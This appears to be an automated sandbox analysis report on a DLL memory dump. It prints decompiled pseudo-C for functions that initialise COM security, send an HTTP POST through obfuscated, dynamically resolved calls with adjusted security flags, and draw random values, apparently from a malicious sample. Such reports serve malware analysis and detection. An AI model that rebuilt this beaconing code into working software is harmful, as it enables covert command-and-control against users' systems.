                                                                                                                                                                                                											__imp__#9( &_v80);
                                                                                                                                                                                                											goto L39;
                                                                                                                                                                                                										}
                                                                                                                                                                                                										_push(_v72);
                                                                                                                                                                                                										_push(L"%d");
                                                                                                                                                                                                										L37:
                                                                                                                                                                                                										_push(0xc);
                                                                                                                                                                                                										_push(_t289);
                                                                                                                                                                                                										E10009621();
                                                                                                                                                                                                										_t329 = _t329 + 0x10;
                                                                                                                                                                                                										goto L38;
                                                                                                                                                                                                									}
                                                                                                                                                                                                									_t230 = _t219 - 1;
                                                                                                                                                                                                									__eflags = _t230;
                                                                                                                                                                                                									if(_t230 == 0) {
                                                                                                                                                                                                										L33:
                                                                                                                                                                                                										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E100085E5(0x18);
                                                                                                                                                                                                										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
                                                                                                                                                                                                										__eflags = _t289;
                                                                                                                                                                                                										if(_t289 == 0) {
                                                                                                                                                                                                											goto L38;
                                                                                                                                                                                                										}
                                                                                                                                                                                                										_push(_v72);
										_push(L"%u");
										goto L37;
									}
									_t235 = _t230 - 1;
									__eflags = _t235;
									if(_t235 == 0) {
										goto L33;
									}
									__eflags = _t235 == 1;
									if(_t235 == 1) {
										goto L33;
									}
									L28:
									__eflags = _t283 & 0x00002000;
									if((_t283 & 0x00002000) == 0) {
										_v88 = E100095C2(_t283, 0x219);
										E10009621( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
										E100085B6( &_v88);
										_t329 = _t329 + 0x18;
										_t298 =  &_v616;
										L31:
										_t242 = E100091C4(_t298);
										L32:
										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
										goto L38;
									}
									_t242 = E1000DA62( &_v80);
									goto L32;
								}
								if(__eflags == 0) {
									__eflags = _v72 - 0xffff;
									_t298 = L"TRUE";
									if(_v72 != 0xffff) {
										_t298 = L"FALSE";
									}
									goto L31;
								}
								_t243 = _t218 - 1;
								__eflags = _t243;
								if(_t243 == 0) {
									goto L38;
								}
								_t244 = _t243 - 1;
								__eflags = _t244;
								if(_t244 == 0) {
									goto L35;
								}
								_t245 = _t244 - 1;
								__eflags = _t245;
								if(_t245 == 0) {
									goto L35;
								}
								__eflags = _t245 != 5;
								if(_t245 != 5) {
									goto L28;
								}
								_t298 = _v72;
								goto L31;
							}
							__imp__#16(_v24);
							_t210 = _v28;
							 *((intOrPtr*)( *_t210 + 8))(_t210);
							_t252 = _v20;
							L42:
							_t262 = _v32;
							_t252 = _t252 + 1;
							_v20 = _t252;
							__eflags = _t262;
							if(_t262 != 0) {
								continue;
							}
							L48:
							_t324 = _v40;
							goto L49;
						}
						_t247 = _v28;
						 *((intOrPtr*)( *_t247 + 8))(_t247);
						goto L42;
					}
					_t262 = _v32;
					goto L48;
				} else {
					E100085FB( &_v36, _t322);
					_t320 = _v36;
					goto L53;
				}
			}

                                                                                                                                                                                                0x1000dcae
                                                                                                                                                                                                0x1000dcbc
                                                                                                                                                                                                0x1000dcbf
                                                                                                                                                                                                0x1000dcc1
                                                                                                                                                                                                0x1000dcda
                                                                                                                                                                                                0x1000dce9
                                                                                                                                                                                                0x1000dcf1
                                                                                                                                                                                                0x1000dcf1
                                                                                                                                                                                                0x1000dcf4
                                                                                                                                                                                                0x1000dcfb
                                                                                                                                                                                                0x1000dcff
                                                                                                                                                                                                0x1000dd05
                                                                                                                                                                                                0x1000dd07
                                                                                                                                                                                                0x1000df77
                                                                                                                                                                                                0x1000df7d
                                                                                                                                                                                                0x1000df83
                                                                                                                                                                                                0x1000df86
                                                                                                                                                                                                0x1000df86
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000df86
                                                                                                                                                                                                0x1000dd16
                                                                                                                                                                                                0x1000dd2a
                                                                                                                                                                                                0x1000dd2e
                                                                                                                                                                                                0x1000dd30
                                                                                                                                                                                                0x1000dd35
                                                                                                                                                                                                0x1000df44
                                                                                                                                                                                                0x1000df4a
                                                                                                                                                                                                0x1000df55
                                                                                                                                                                                                0x1000df60
                                                                                                                                                                                                0x1000df66
                                                                                                                                                                                                0x1000df6c
                                                                                                                                                                                                0x1000df6f
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000df6f
                                                                                                                                                                                                0x1000dd3b
                                                                                                                                                                                                0x1000df12
                                                                                                                                                                                                0x1000df12
                                                                                                                                                                                                0x1000df15
                                                                                                                                                                                                0x1000df18
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000dd43
                                                                                                                                                                                                0x1000dd4b
                                                                                                                                                                                                0x1000dd52
                                                                                                                                                                                                0x1000dd58
                                                                                                                                                                                                0x1000dd5a
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000dd63
                                                                                                                                                                                                0x1000dd78
                                                                                                                                                                                                0x1000dd7e
                                                                                                                                                                                                0x1000dd87
                                                                                                                                                                                                0x1000dd8a
                                                                                                                                                                                                0x1000dd8d
                                                                                                                                                                                                0x1000dd8f
                                                                                                                                                                                                0x1000df05
                                                                                                                                                                                                0x1000df08
                                                                                                                                                                                                0x1000df11
                                                                                                                                                                                                0x1000df11
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000df11
                                                                                                                                                                                                0x1000dd9f
                                                                                                                                                                                                0x1000dda2
                                                                                                                                                                                                0x1000dda9
                                                                                                                                                                                                0x1000ddaf
                                                                                                                                                                                                0x1000ddb2
                                                                                                                                                                                                0x1000ddb5
                                                                                                                                                                                                0x1000ddb8
                                                                                                                                                                                                0x1000ddbb
                                                                                                                                                                                                0x1000ddf7
                                                                                                                                                                                                0x1000ddf7
                                                                                                                                                                                                0x1000ddfa
                                                                                                                                                                                                0x1000dea6
                                                                                                                                                                                                0x1000deba
                                                                                                                                                                                                0x1000deca
                                                                                                                                                                                                0x1000dece
                                                                                                                                                                                                0x1000ded0
                                                                                                                                                                                                0x1000dee7
                                                                                                                                                                                                0x1000deeb
                                                                                                                                                                                                0x1000def4
                                                                                                                                                                                                0x1000deff
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000deff
                                                                                                                                                                                                0x1000ded6
                                                                                                                                                                                                0x1000ded7
                                                                                                                                                                                                0x1000dedc
                                                                                                                                                                                                0x1000dedc
                                                                                                                                                                                                0x1000dede
                                                                                                                                                                                                0x1000dedf
                                                                                                                                                                                                0x1000dee4
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000dee4
                                                                                                                                                                                                0x1000de00
                                                                                                                                                                                                0x1000de00
                                                                                                                                                                                                0x1000de03
                                                                                                                                                                                                0x1000de6e
                                                                                                                                                                                                0x1000de82
                                                                                                                                                                                                0x1000de92
                                                                                                                                                                                                0x1000de96
                                                                                                                                                                                                0x1000de98
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000de9e
                                                                                                                                                                                                0x1000de9f
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000de9f
                                                                                                                                                                                                0x1000de05
                                                                                                                                                                                                0x1000de05
                                                                                                                                                                                                0x1000de08
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000de0a
                                                                                                                                                                                                0x1000de0d
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000de0f
                                                                                                                                                                                                0x1000de0f
                                                                                                                                                                                                0x1000de15
                                                                                                                                                                                                0x1000de31
                                                                                                                                                                                                0x1000de40
                                                                                                                                                                                                0x1000de49
                                                                                                                                                                                                0x1000de4e
                                                                                                                                                                                                0x1000de51
                                                                                                                                                                                                0x1000de57
                                                                                                                                                                                                0x1000de57
                                                                                                                                                                                                0x1000de5c
                                                                                                                                                                                                0x1000de68
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000de68
                                                                                                                                                                                                0x1000de1a
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000de1a
                                                                                                                                                                                                0x1000ddbd
                                                                                                                                                                                                0x1000dde4
                                                                                                                                                                                                0x1000dde9
                                                                                                                                                                                                0x1000ddee
                                                                                                                                                                                                0x1000ddf0
                                                                                                                                                                                                0x1000ddf0

                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 1000D565: CoInitializeEx.OLE32(00000000,00000000,00000000,?,00000000,00000000,?,1000D865,00000C5B,00000000,?,00000000), ref: 1000D578
                                                                                                                                                                                                  • Part of subcall function 1000D565: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,1000D865,00000C5B,00000000,?,00000000), ref: 1000D589
                                                                                                                                                                                                  • Part of subcall function 1000D565: CoCreateInstance.OLE32(1001B848,00000000,00000001,1001B858,?,?,1000D865,00000C5B,00000000,?,00000000), ref: 1000D5A0
                                                                                                                                                                                                  • Part of subcall function 1000D565: SysAllocString.OLEAUT32(00000000), ref: 1000D5AB
                                                                                                                                                                                                  • Part of subcall function 1000D565: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,1000D865,00000C5B,00000000,?,00000000), ref: 1000D5D6
                                                                                                                                                                                                  • Part of subcall function 100085E5: HeapAlloc.KERNEL32(00000008,?,?,10008F65,00000100,?,10005FAC), ref: 100085F3
                                                                                                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 1000DC27
                                                                                                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 1000DC3B
                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 1000DFC4
                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 1000DFCD
                                                                                                                                                                                                  • Part of subcall function 100085FB: HeapFree.KERNEL32(00000000,00000000,00000001,000000FF,10006024), ref: 10008641
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: String$Alloc$Free$HeapInitialize$BlanketCreateInstanceProxySecurity
                                                                                                                                                                                                • String ID: FALSE$TRUE
                                                                                                                                                                                                • API String ID: 224402418-1412513891
                                                                                                                                                                                                • Opcode ID: b00b089e101aed652551e51a4ddbeb04ee9bf59de0f61b667913ab7306e45569
                                                                                                                                                                                                • Instruction ID: 3f90699cde44849cf2b34476e100de7a07988fa2d5f348b69e34af0afe34155d
                                                                                                                                                                                                • Opcode Fuzzy Hash: b00b089e101aed652551e51a4ddbeb04ee9bf59de0f61b667913ab7306e45569
                                                                                                                                                                                                • Instruction Fuzzy Hash: 44E16275D006199FEB04EFE4CC85EAEBBB5FF08380F10855AE505A7299DB30EA05CB60
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 83%
                                                                                                                                                                                                			E1000E6AA(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr _a24) {
                                                                                                                                                                                                				char _v8;
                                                                                                                                                                                                				char _v12;
                                                                                                                                                                                                				signed int _v16;
                                                                                                                                                                                                				signed int _v20;
                                                                                                                                                                                                				char _v24;
                                                                                                                                                                                                				intOrPtr _v28;
                                                                                                                                                                                                				char _v32;
                                                                                                                                                                                                				intOrPtr _v36;
                                                                                                                                                                                                				signed int _v40;
                                                                                                                                                                                                				signed int _v44;
                                                                                                                                                                                                				intOrPtr _v48;
                                                                                                                                                                                                				intOrPtr _v52;
                                                                                                                                                                                                				intOrPtr _v56;
                                                                                                                                                                                                				intOrPtr _v60;
                                                                                                                                                                                                				char _v64;
                                                                                                                                                                                                				int _v76;
                                                                                                                                                                                                				void* _v80;
                                                                                                                                                                                                				intOrPtr _v100;
                                                                                                                                                                                                				int _v104;
                                                                                                                                                                                                				void* _v108;
                                                                                                                                                                                                				intOrPtr _v112;
                                                                                                                                                                                                				intOrPtr _v116;
                                                                                                                                                                                                				char* _v120;
                                                                                                                                                                                                				void _v124;
                                                                                                                                                                                                				char _v140;
                                                                                                                                                                                                				void _v396;
                                                                                                                                                                                                				void _v652;
                                                                                                                                                                                                				intOrPtr _t105;
                                                                                                                                                                                                				intOrPtr _t113;
                                                                                                                                                                                                				intOrPtr* _t115;
                                                                                                                                                                                                				intOrPtr _t118;
                                                                                                                                                                                                				intOrPtr _t121;
                                                                                                                                                                                                				intOrPtr _t124;
                                                                                                                                                                                                				intOrPtr _t127;
                                                                                                                                                                                                				intOrPtr _t131;
                                                                                                                                                                                                				char _t133;
                                                                                                                                                                                                				intOrPtr _t136;
                                                                                                                                                                                                				char _t138;
                                                                                                                                                                                                				char _t139;
                                                                                                                                                                                                				intOrPtr _t141;
                                                                                                                                                                                                				intOrPtr _t147;
                                                                                                                                                                                                				intOrPtr _t154;
                                                                                                                                                                                                				intOrPtr _t158;
                                                                                                                                                                                                				intOrPtr _t162;
                                                                                                                                                                                                				intOrPtr _t164;
                                                                                                                                                                                                				intOrPtr _t166;
                                                                                                                                                                                                				intOrPtr _t172;
                                                                                                                                                                                                				intOrPtr _t176;
                                                                                                                                                                                                				void* _t183;
                                                                                                                                                                                                				void* _t185;
                                                                                                                                                                                                				intOrPtr _t186;
                                                                                                                                                                                                				char _t195;
                                                                                                                                                                                                				intOrPtr _t203;
                                                                                                                                                                                                				intOrPtr _t204;
                                                                                                                                                                                                				signed int _t209;
                                                                                                                                                                                                				void _t212;
                                                                                                                                                                                                				intOrPtr _t213;
                                                                                                                                                                                                				void* _t214;
                                                                                                                                                                                                				intOrPtr _t216;
                                                                                                                                                                                                				char _t217;
                                                                                                                                                                                                				intOrPtr _t218;
                                                                                                                                                                                                				signed int _t219;
                                                                                                                                                                                                				signed int _t220;
                                                                                                                                                                                                				void* _t221;
                                                                                                                                                                                                
                                                                                                                                                                                                				_v40 = _v40 & 0x00000000;
                                                                                                                                                                                                				_v24 = 4;
                                                                                                                                                                                                				_v36 = 1;
                                                                                                                                                                                                				_t214 = __edx;
                                                                                                                                                                                                				memset( &_v396, 0, 0x100);
                                                                                                                                                                                                				memset( &_v652, 0, 0x100);
                                                                                                                                                                                                				_v64 = E100095A8(0x85b);
                                                                                                                                                                                                				_v60 = E100095A8(0xdc9);
                                                                                                                                                                                                				_v56 = E100095A8(0x65d);
                                                                                                                                                                                                				_v52 = E100095A8(0xdd3);
                                                                                                                                                                                                				_t105 = E100095A8(0xb74);
                                                                                                                                                                                                				_v44 = _v44 & 0;
                                                                                                                                                                                                				_t212 = 0x3c;
                                                                                                                                                                                                				_v48 = _t105;
                                                                                                                                                                                                				memset( &_v124, 0, 0x100);
                                                                                                                                                                                                				_v116 = 0x10;
                                                                                                                                                                                                				_v120 =  &_v140;
                                                                                                                                                                                                				_v124 = _t212;
                                                                                                                                                                                                				_v108 =  &_v396;
                                                                                                                                                                                                				_v104 = 0x100;
                                                                                                                                                                                                				_v80 =  &_v652;
                                                                                                                                                                                                				_push( &_v124);
                                                                                                                                                                                                				_push(0);
                                                                                                                                                                                                				_v76 = 0x100;
                                                                                                                                                                                                				_push(E1000C3BB(_t214));
                                                                                                                                                                                                				_t113 =  *0x1001e6a4; // 0x0
                                                                                                                                                                                                				_push(_t214);
                                                                                                                                                                                                				if( *((intOrPtr*)(_t113 + 0x28))() != 0) {
                                                                                                                                                                                                					_t209 = 0;
                                                                                                                                                                                                					_v20 = 0;
                                                                                                                                                                                                					do {
                                                                                                                                                                                                						_t115 =  *0x1001e6a4; // 0x0
                                                                                                                                                                                                						_v12 = 0x8404f700;
                                                                                                                                                                                                						_t213 =  *_t115( *0x1001e788,  *((intOrPtr*)(_t221 + _t209 * 4 - 0x24)), 0, 0, 0);
                                                                                                                                                                                                						if(_t213 != 0) {
                                                                                                                                                                                                							_t195 = 3;
                                                                                                                                                                                                							_t185 = 4;
                                                                                                                                                                                                							_v8 = _t195;
                                                                                                                                                                                                							_t118 =  *0x1001e6a4; // 0x0
                                                                                                                                                                                                							 *((intOrPtr*)(_t118 + 0x14))(_t213, _t195,  &_v8, _t185);
                                                                                                                                                                                                							_v8 = 0x3a98;
                                                                                                                                                                                                							_t121 =  *0x1001e6a4; // 0x0
                                                                                                                                                                                                							 *((intOrPtr*)(_t121 + 0x14))(_t213, 2,  &_v8, _t185);
                                                                                                                                                                                                							_v8 = 0x493e0;
                                                                                                                                                                                                							_t124 =  *0x1001e6a4; // 0x0
                                                                                                                                                                                                							 *((intOrPtr*)(_t124 + 0x14))(_t213, 6,  &_v8, _t185);
                                                                                                                                                                                                							_v8 = 0x493e0;
                                                                                                                                                                                                							_t127 =  *0x1001e6a4; // 0x0
                                                                                                                                                                                                							 *((intOrPtr*)(_t127 + 0x14))(_t213, 5,  &_v8, _t185);
                                                                                                                                                                                                							_t131 =  *0x1001e6a4; // 0x0
                                                                                                                                                                                                							_t186 =  *((intOrPtr*)(_t131 + 0x1c))(_t213,  &_v396, _v100, 0, 0, 3, 0, 0);
                                                                                                                                                                                                							if(_a24 != 0) {
                                                                                                                                                                                                								E100097ED(_a24);
                                                                                                                                                                                                							}
                                                                                                                                                                                                							if(_t186 != 0) {
                                                                                                                                                                                                								_t133 = 0x8484f700;
                                                                                                                                                                                                								if(_v112 != 4) {
                                                                                                                                                                                                									_t133 = _v12;
                                                                                                                                                                                                								}
                                                                                                                                                                                                								_t136 =  *0x1001e6a4; // 0x0
                                                                                                                                                                                                								_t216 =  *((intOrPtr*)(_t136 + 0x20))(_t186, "POST",  &_v652, 0, 0,  &_v64, _t133, 0);
                                                                                                                                                                                                								_v8 = _t216;
                                                                                                                                                                                                								if(_a24 != 0) {
                                                                                                                                                                                                									E100097ED(_a24);
                                                                                                                                                                                                								}
                                                                                                                                                                                                								if(_t216 != 0) {
                                                                                                                                                                                                									_t138 = 4;
                                                                                                                                                                                                									if(_v112 != _t138) {
                                                                                                                                                                                                										L19:
                                                                                                                                                                                                										_t139 = E100095A8(0x777);
                                                                                                                                                                                                										_t217 = _t139;
                                                                                                                                                                                                										_v12 = _t217;
                                                                                                                                                                                                										_t141 =  *0x1001e6a4; // 0x0
                                                                                                                                                                                                										_t218 = _v8;
                                                                                                                                                                                                										_v28 =  *((intOrPtr*)(_t141 + 0x24))(_t218, _t217, E1000C3BB(_t217), _a4, _a8);
                                                                                                                                                                                                										E100085A3( &_v12);
                                                                                                                                                                                                										if(_a24 != 0) {
                                                                                                                                                                                                											E100097ED(_a24);
                                                                                                                                                                                                										}
                                                                                                                                                                                                										if(_v28 != 0) {
                                                                                                                                                                                                											L28:
                                                                                                                                                                                                											_v24 = 8;
                                                                                                                                                                                                											_push(0);
                                                                                                                                                                                                											_v32 = 0;
                                                                                                                                                                                                											_v28 = 0;
                                                                                                                                                                                                											_push( &_v24);
                                                                                                                                                                                                											_push( &_v32);
                                                                                                                                                                                                											_t147 =  *0x1001e6a4; // 0x0
                                                                                                                                                                                                											_push(0x13);
                                                                                                                                                                                                											_push(_t218);
                                                                                                                                                                                                											if( *((intOrPtr*)(_t147 + 0xc))() != 0) {
                                                                                                                                                                                                												_t219 = E1000972A( &_v32);
                                                                                                                                                                                                												if(_t219 == 0xc8) {
                                                                                                                                                                                                													 *_a20 = _v8;
                                                                                                                                                                                                													 *_a12 = _t213;
                                                                                                                                                                                                													 *_a16 = _t186;
                                                                                                                                                                                                													return 0;
                                                                                                                                                                                                												}
                                                                                                                                                                                                												_t220 =  ~_t219;
                                                                                                                                                                                                												L32:
                                                                                                                                                                                                												_t154 =  *0x1001e6a4; // 0x0
                                                                                                                                                                                                												 *((intOrPtr*)(_t154 + 8))(_v8);
                                                                                                                                                                                                												L33:
                                                                                                                                                                                                												if(_t186 != 0) {
                                                                                                                                                                                                													_t158 =  *0x1001e6a4; // 0x0
                                                                                                                                                                                                													 *((intOrPtr*)(_t158 + 8))(_t186);
                                                                                                                                                                                                												}
                                                                                                                                                                                                												if(_t213 != 0) {
                                                                                                                                                                                                													_t203 =  *0x1001e6a4; // 0x0
                                                                                                                                                                                                													 *((intOrPtr*)(_t203 + 8))(_t213);
                                                                                                                                                                                                												}
                                                                                                                                                                                                												return _t220;
                                                                                                                                                                                                											}
                                                                                                                                                                                                											GetLastError();
                                                                                                                                                                                                											_t220 = 0xfffffff8;
                                                                                                                                                                                                											goto L32;
                                                                                                                                                                                                										} else {
                                                                                                                                                                                                											GetLastError();
                                                                                                                                                                                                											_t162 =  *0x1001e6a4; // 0x0
                                                                                                                                                                                                											 *((intOrPtr*)(_t162 + 8))(_t218);
                                                                                                                                                                                                											_t218 = 0;
                                                                                                                                                                                                											goto L23;
                                                                                                                                                                                                										}
                                                                                                                                                                                                									}
                                                                                                                                                                                                									_v12 = _t138;
                                                                                                                                                                                                									_push( &_v12);
                                                                                                                                                                                                									_push( &_v16);
                                                                                                                                                                                                									_t172 =  *0x1001e6a4; // 0x0
                                                                                                                                                                                                									_push(0x1f);
                                                                                                                                                                                                									_push(_t216);
                                                                                                                                                                                                									if( *((intOrPtr*)(_t172 + 0x18))() == 0) {
                                                                                                                                                                                                										L18:
                                                                                                                                                                                                										GetLastError();
                                                                                                                                                                                                										goto L19;
                                                                                                                                                                                                									}
                                                                                                                                                                                                									_v16 = _v16 | 0x00003380;
                                                                                                                                                                                                									_push(4);
                                                                                                                                                                                                									_push( &_v16);
                                                                                                                                                                                                									_t176 =  *0x1001e6a4; // 0x0
                                                                                                                                                                                                									_push(0x1f);
                                                                                                                                                                                                									_push(_t216);
                                                                                                                                                                                                									if( *((intOrPtr*)(_t176 + 0x14))() != 0) {
                                                                                                                                                                                                										goto L19;
                                                                                                                                                                                                									}
                                                                                                                                                                                                									goto L18;
                                                                                                                                                                                                								} else {
                                                                                                                                                                                                									GetLastError();
                                                                                                                                                                                                									L23:
                                                                                                                                                                                                									_t164 =  *0x1001e6a4; // 0x0
                                                                                                                                                                                                									 *((intOrPtr*)(_t164 + 8))(_t186);
                                                                                                                                                                                                									_t186 = 0;
                                                                                                                                                                                                									goto L24;
                                                                                                                                                                                                								}
                                                                                                                                                                                                							} else {
                                                                                                                                                                                                								GetLastError();
                                                                                                                                                                                                								L24:
                                                                                                                                                                                                								_t166 =  *0x1001e6a4; // 0x0
                                                                                                                                                                                                								 *((intOrPtr*)(_t166 + 8))(_t213);
                                                                                                                                                                                                								_t213 = 0;
                                                                                                                                                                                                								goto L25;
                                                                                                                                                                                                							}
                                                                                                                                                                                                						}
                                                                                                                                                                                                						GetLastError();
                                                                                                                                                                                                						L25:
                                                                                                                                                                                                						_t204 = _t218;
                                                                                                                                                                                                						_t209 = _v20 + 1;
                                                                                                                                                                                                						_v20 = _t209;
                                                                                                                                                                                                					} while (_t209 < 2);
                                                                                                                                                                                                					_v8 = _t218;
                                                                                                                                                                                                					if(_t204 != 0) {
                                                                                                                                                                                                						goto L28;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					_t220 = 0xfffffffe;
                                                                                                                                                                                                					goto L33;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				_t183 = 0xfffffffc;
                                                                                                                                                                                                				return _t183;
                                                                                                                                                                                                			}
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000e8ad
                                                                                                                                                                                                0x1000e8ad
                                                                                                                                                                                                0x1000e956
                                                                                                                                                                                                0x1000e956
                                                                                                                                                                                                0x1000e95c
                                                                                                                                                                                                0x1000e95f
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000e95f
                                                                                                                                                                                                0x1000e85e
                                                                                                                                                                                                0x1000e85e
                                                                                                                                                                                                0x1000e961
                                                                                                                                                                                                0x1000e961
                                                                                                                                                                                                0x1000e967
                                                                                                                                                                                                0x1000e96a
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000e96a
                                                                                                                                                                                                0x1000e85c
                                                                                                                                                                                                0x1000e7c7
                                                                                                                                                                                                0x1000e96c
                                                                                                                                                                                                0x1000e96f
                                                                                                                                                                                                0x1000e971
                                                                                                                                                                                                0x1000e974
                                                                                                                                                                                                0x1000e977
                                                                                                                                                                                                0x1000e980
                                                                                                                                                                                                0x1000e985
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000e989
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000e989
                                                                                                                                                                                                0x1000e796
                                                                                                                                                                                                0x00000000

APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp
• Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp
• Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp
• Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp
Similarity
• API ID: memset$ErrorLast
• String ID: POST
• API String ID: 2570506013-1814004025
• Opcode ID: 5a0725573e378c80a65e7a2a1159a5cfc04c149060dda8d6e7e239403e9697d9
• Instruction ID: f9dd7afb372abb5d351a9ef47c86561eaabd2c0e7409e6987b0a63c15f5cbcc7
• Opcode Fuzzy Hash: 5a0725573e378c80a65e7a2a1159a5cfc04c149060dda8d6e7e239403e9697d9
• Instruction Fuzzy Hash: FCB14EB1900258AFEB55CFA4CC88E9EBBF8EF58391F104169F505EB290DB749E44CB61
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 28%
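E100116F0(signed int* _a4) {
	char _v8;
	_Unknown_base(*)()* _v12;
	_Unknown_base(*)()* _v16;
	char _v20;
	_Unknown_base(*)()* _t16;
	_Unknown_base(*)()* _t17;
	void* _t22;
	intOrPtr* _t28;
	signed int _t29;
	signed int _t30;
	struct HINSTANCE__* _t32;
	void* _t34;

	_t30 = 0;
	_v8 = 0;
	// Resolve the CryptoAPI entry points at run time from advapi32.dll.
	_t32 = GetModuleHandleA("advapi32.dll");
	if(_t32 == 0) {
		L9:
		// Common failure path: returns 1.
		return 1;
	}
	_t16 = GetProcAddress(_t32, "CryptAcquireContextA");
	_v12 = _t16;
	if(_t16 == 0) {
		goto L9;
	}
	_t17 = GetProcAddress(_t32, "CryptGenRandom");
	_v16 = _t17;
	if(_t17 == 0) {
		goto L9;
	}
	_t28 = GetProcAddress(_t32, "CryptReleaseContext");
	if(_t28 == 0) {
		goto L9;
	}
	// Arguments for CryptAcquireContextA (_v12), pushed last to first:
	// dwFlags = 0xf0000000 (CRYPT_VERIFYCONTEXT), dwProvType = 1 (PROV_RSA_FULL),
	// szProvider = 0, szContainer = 0, phProv = &_v8.
	_push(0xf0000000);
	_push(1);
	_push(0);
	_push(0);
	_push( &_v8);
	if(_v12() == 0) {
		goto L9;
	}
	// CryptGenRandom: request 4 random bytes, then release the provider handle.
	_t22 = _v16(_v8, 4,  &_v20);
	 *_t28(_v8, 0);
	if(_t22 == 0) {
		goto L9;
	}
	_t29 = 0;
	// Pack four bytes into one 32-bit value, first byte most significant.
	do {
		_t30 = _t30 << 0x00000008 |  *(_t34 + _t29 - 0x10) & 0x000000ff;
		_t29 = _t29 + 1;
	} while (_t29 < 4);
	 *_a4 = _t30;
	// Success: the value is stored through _a4 and 0 is returned.
	return 0;
}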
















                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(advapi32.dll,00000000,00000000,00000000,1000763B,?,?,00000000,?), ref: 10011703
                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 1001171B
                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CryptGenRandom), ref: 1001172A
                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CryptReleaseContext), ref: 10011739
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AddressProc$HandleModule
                                                                                                                                                                                                • String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
                                                                                                                                                                                                • API String ID: 667068680-129414566
                                                                                                                                                                                                • Opcode ID: 28a6bd55db4c52fb8d64142f74f2f0f370d8df5068d6a386676288cd47c78c0a
                                                                                                                                                                                                • Instruction ID: 1d873b0b542639c3e1302bc7ac39bee5e88f59f20418ff601a6babcc510261b2
                                                                                                                                                                                                • Opcode Fuzzy Hash: 28a6bd55db4c52fb8d64142f74f2f0f370d8df5068d6a386676288cd47c78c0a
